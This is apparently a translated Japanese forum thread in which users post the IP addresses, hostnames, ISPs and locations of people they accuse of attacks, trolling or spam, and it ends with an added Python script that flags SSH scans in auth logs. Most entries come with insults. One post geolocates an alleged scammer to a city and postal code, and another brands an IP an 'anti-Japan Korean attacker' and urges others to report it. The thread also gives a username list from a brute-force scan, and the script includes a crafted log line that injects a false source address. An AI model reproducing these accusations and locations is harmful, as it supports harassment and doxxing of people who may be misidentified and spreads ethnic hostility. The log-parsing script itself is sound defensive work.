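Area code: N/A
Connection type: N/A
Prefecture: N/A
You're in the way, dumbass

IP address: 122.18.75.228
Hostname: p1228-ipbf802sapodori.hokkaido.ocn.ne.jp
Country of IP allocation: Japan ( jp )
Area code: N/A
Connection type: Fiber
Prefecture: Hokkaido
You're in the way, dumbass

Is this Mr. googlebot, who shows up a lot in netstat?
TCP <hostname>:2035 nrt04s05-in-f3.1e100.net:http TIME_WAIT
It shows up so often it's creepy.
This is just a client machine and I don't publish anything externally,
but when I access Google with JavaScript turned off,
I almost always get visits from this domain for a while afterward.

IP address: 182.250.240.2
Hostname: KD182250240002.au-net.ne.jp
Country of IP allocation: Japan ( jp )
Area code: N/A
Connection type: Type unknown
Prefecture: N/A
You're so persistent, you scumbag!!

IP address: 115.65.5.170
Hostname: g170.115-65-5.ppp.wakwak.ne.jp
Country of IP allocation: Japan ( jp )
Area code: N/A
Connection type: Fiber
Prefecture: Aomori
You're so persistent, you scumbag!!

IP address: 123.224.187.59
Hostname: p2059-ipbf4102marunouchi.tokyo.ocn.ne.jp
Country of IP allocation: Japan ( jp )
Area code: N/A
Connection type: Fiber
Prefecture: Tokyo
You too. You're in the way.

IP address: 119.105.170.249
Hostname: KD119105170249.ppp-bb.dion.ne.jp
Country of IP allocation: Japan ( jp )
Area code: N/A
Connection type: Fiber
Prefecture: Tokyo
You're in the way, trash!!

IP address: 122.16.37.149
Hostname: p2149-ipbf1001sapodori.hokkaido.ocn.ne.jp
Country of IP allocation: Japan ( jp )
Area code: N/A
Connection type: Fiber
Prefecture: Hokkaido

IP address: 126.209.132.45
Hostname: pw126209132045.4.kyb.panda-world.ne.jp
Country of IP allocation: Japan ( jp )
Area code: N/A
Connection type: Mobile phone
Prefecture: N/A

IP address: 220.247.10.107
Hostname: static-220-247-10-107.b-man.svips.gol.ne.jp
Country of IP allocation: Japan ( jp )
Area code: N/A
Connection type: Fiber
Prefecture: N/A
You're so persistent, you scumbag!!

This is a little different from an attack, but
the crawler from Baidu, the data-harvesting service everyone is talking about right now, is the worst, so
I block it across all of Baidu's allocated IP ranges.

IP address: 124.84.37.47
Hostname: p4047-ipbf504sapodori.hokkaido.ocn.ne.jp
Country of IP allocation: Japan ( jp )
Area code: N/A
Connection type: Fiber
Prefecture: Hokkaido
Drop dead, you piece of trash!!

IP address: 219.104.230.145
Hostname: hmmt105145.catv.ppp.infoweb.ne.jp
Country of IP allocation: Japan ( jp )
Area code: N/A
Connection type: CATV
Prefecture: Shizuoka
You're in the way, scum!!

IP address: 123.198.39.72
Hostname: p7bc62748.szoknt01.ap.so-net.ne.jp
Country of IP allocation: Japan ( jp )
Area code: N/A
Connection type: Type unknown
Prefecture: Shizuoka
You're in the way, scum!!

IP address: 223.218.116.37
Hostname: i223-218-116-37.s41.a002.ap.plala.or.jp
Country of IP allocation: Japan ( jp )
Area code: N/A
Connection type: Fiber
Prefecture: Yamagata
You're so persistent, you scumbag!!

IP address: 61.27.82.154
Hostname: 61-27-82-154.rev.home.ne.jp
Country of IP allocation: Japan ( jp )
Area code: 011
Connection type: CATV
Prefecture: Hokkaido
You too!!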
IP address: 126.121.2.38
Hostname: softbank126121002038.bbtec.net
Country of IP allocation: Japan ( jp )
Area code: N/A
Connection type: Fiber
Prefecture: Hokkaido

User ID # Person of concern 2415 [someone who comes from a defamation site and digs around]
Hostname # i114-180-180-98.s04.a001.ap.plala.or.jp
IP address # 114.180.180.98
Stop snooping, you scum!!

IP address: 114.176.228.202
Hostname: p25202-ipngn100401fukuokachu.fukuoka.ocn.ne.jp
Country of IP allocation: Japan ( jp )
Area code: N/A
Connection type: Fiber
Prefecture: Fukuoka

a. [IPネットワークアドレス] 59.86.64.0/18
b. [ネットワーク名] TOKAI-NET
f. [組織名] 株式会社TOKAIコミュニケーションズ
g. [Organization] TOKAI Communications Corporation
m. [管理者連絡窓口] JP00078308
n. [技術連絡担当者] JP00078308

IP address: 113.159.230.90
Hostname: KD113159230090.ppp-bb.dion.ne.jp
Country of IP allocation: Japan ( jp )
Area code: N/A
Connection type: Fiber
Prefecture: Hokkaido
This guy again. You're so persistent, you scumbag!!

IP address: 113.38.179.234
Hostname: 113x38x179x234.ap113.ftth.ucom.ne.jp
Country of IP allocation: Japan ( jp )
Area code: N/A
Connection type: Fiber
Prefecture: N/A

Even though it was a mispost, the thread was moving for the first time in a while, so:
IP: 192.151.148.234
Host: could not be obtained
Attempts trackback spam several hundred times a day

Currently being captured by my Asterisk honeypot
212.83.179.104
195.154.58.164

Currently being captured by my Asterisk honeypot
85.25.217.111

No attacks, but I get proxy-hunting traffic every day.
Lately a lot of it comes from .edu, Shanghai, Singapore and France.
Occasionally there is odd access from free cloud services.

>>229 SOFTLAYER, huh.
Proxy hunters came to my place too. CHINANET-* and HINET.
At this point it would be more peaceful to just block by CN.
By the way, when I opened up ssh, a user scan arrived within about 12 hours.
Partway through, root cracking began.
After that, they were also looking for mysql.
I was idly watching tcpdump while drinking, and it was quite educational.

In the spirit of sharing, here are a few picked from those used in the user scan:
123, 123456, Test, apache1, apache2, bash, boot, cacti, cactiuser, git, jboss, httpd2, httpdocs, java, javaprg, jboss, nagiosadmin, nagiosuser, nginx, r00t, oracle, resin, sysadmin, weblogic, webmail, zabbix
and so on.
There were a few unusual usernames too, but I'm leaving them out since they could identify me.
To sum up, even if you're having a machine do it, I'd have liked to see a bit more ingenuity.
Repeating what was already tried over and over, and finally ending in a mere bandwidth-saturation attack, is a snooze.

ttp://whatismyipaddress.com/ip/180.18.104.237
I tried several check sites, but ↑ whatismyipaddress.com was the most accurate.
I wonder if there's a more precise analysis that can identify a malicious person down to the municipality. One will probably appear eventually.
Here is the result of entering the log of a China/Korea-based scammer with poor Japanese. The check site puts the location in Wakayama; they'll probably change it again, though.
IP: 180.18.104.237
Decimal: 3021105389
Hostname: p9237-ipngn100102wakayama.wakayama.ocn.ne.jp
ASN: 4713
ISP: Open Computer Network
Organization: Open Computer Network
Services: None detected
Type: Broadband
Assignment: Static IP
Blacklist: Blacklist Check
Geolocation Information
Continent: Asia
Country: Japan
State/Region: Wakayama
City: Hashimoto
Latitude: 34.3167 (34° 19′ 0.12″ N)
Longitude: 135.6167 (135° 37′ 0.12″ E)
Postal Code: 648-0065

A troll who keeps coming no matter how many times I ban them
p8198-ipngn8701marunouchi.tokyo.ocn.ne.jp
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/3B1817

222.159.86.54 nthygo026054.hygo.nt.ngn.ppp.infoweb.ne.jp
1.33.103.216 pl2008.nas81a.soka.nttpc.ne.jp
210.48.224.81 210.48.224.81.static.zoot.jp

126.113.224.214 softbank126113224214.biz.bbtec.net
An anti-Japan Korean attacker; please report them

softbank126021144028.bbtec.net
pw126152034165.10.panda-world.ne.jp
pw126245140157.16.panda-world.ne.jp
i125-202-241-233.s42.a014.ap.plala.or.jp
p1137-ipbfp2603osakakita.osaka.ocn.ne.jp
ag220-213-220-206.ccnw.ne.jp

IP address: 110.67.193.14
Hostname: p43c10e.gifunt01.ap.so-net.ne.jp
IP address allocation area
Country: Japan
Prefecture (CF value): Gifu ( 95 )
Municipality (CF value): Gifu City ( 55 )
(ガラプー KK9f-DV3b [0681HnY])= (アウアウカー Sa9f-k4J3 [182.250.242.84])
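The `Failed password for invalid user ...` sshd lines quoted earlier in this thread, and the SSH post describing a username scan that turned into root cracking, suggest a simple per-address check over the auth log. The following is an added example, not code from any poster: the log lines are constructed, the addresses come from documentation ranges, and the thresholds and the `classify` name are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in the sshd format quoted in this thread; the addresses
# are documentation ranges, not hosts named by any poster.
SAMPLE_LOG = """\
Aug 26 06:24:34 host sshd[101]: Failed password for invalid user bart from 192.0.2.10 port 33426 ssh2
Aug 26 06:24:37 host sshd[102]: Failed password for invalid user cacti from 192.0.2.10 port 33431 ssh2
Aug 26 06:24:40 host sshd[103]: Failed password for invalid user zabbix from 192.0.2.10 port 33440 ssh2
Aug 26 06:24:43 host sshd[104]: Failed password for invalid user x from 203.0.113.5 port 1 ssh2 from 192.0.2.10 port 33452 ssh2
Aug 26 06:25:01 host sshd[105]: Failed password for root from 192.0.2.10 port 33460 ssh2
Aug 26 06:25:03 host sshd[106]: Failed password for root from 192.0.2.10 port 33466 ssh2
Aug 26 06:25:05 host sshd[107]: Failed password for root from 192.0.2.10 port 33470 ssh2
Aug 26 07:10:12 host sshd[108]: Failed password for root from 198.51.100.7 port 50122 ssh2
Aug 26 07:10:15 host sshd[108]: Received disconnect from 198.51.100.7: 11: Bye Bye [preauth]
"""

# The username is chosen by the client and may contain spaces, so the pattern
# is anchored at the end of the line: the greedy (.*) leaves only the final
# "from <addr> port <n> ssh2", which sshd itself wrote, for the address group.
FAILED = re.compile(
    r"sshd\[\d+\]: Failed password for (invalid user )?(.*) from (\S+) port \d+ ssh2$"
)

def classify(log_text, scan_users=4, root_tries=3):
    """Label source addresses; both thresholds are assumed values."""
    unknown = defaultdict(set)   # address -> distinct nonexistent usernames tried
    root = defaultdict(int)      # address -> failed password attempts for root
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if not m:
            continue             # PAM chatter, disconnects, other daemons
        invalid, user, addr = m.groups()
        if invalid:
            unknown[addr].add(user)
        elif user == "root":
            root[addr] += 1
    verdict = defaultdict(set)
    for addr, names in unknown.items():
        if len(names) >= scan_users:
            verdict[addr].add("user-scan")
    for addr, count in root.items():
        if count >= root_tries:
            verdict[addr].add("root-bruteforce")
    return dict(verdict)

if __name__ == "__main__":
    for addr, labels in sorted(classify(SAMPLE_LOG).items()):
        print(addr, ",".join(sorted(labels)))
```

The fourth sample line carries a username crafted to look like a second `from ... port ...` clause; a pattern that takes the first address on the line would attribute that attempt to 203.0.113.5 instead of the real source.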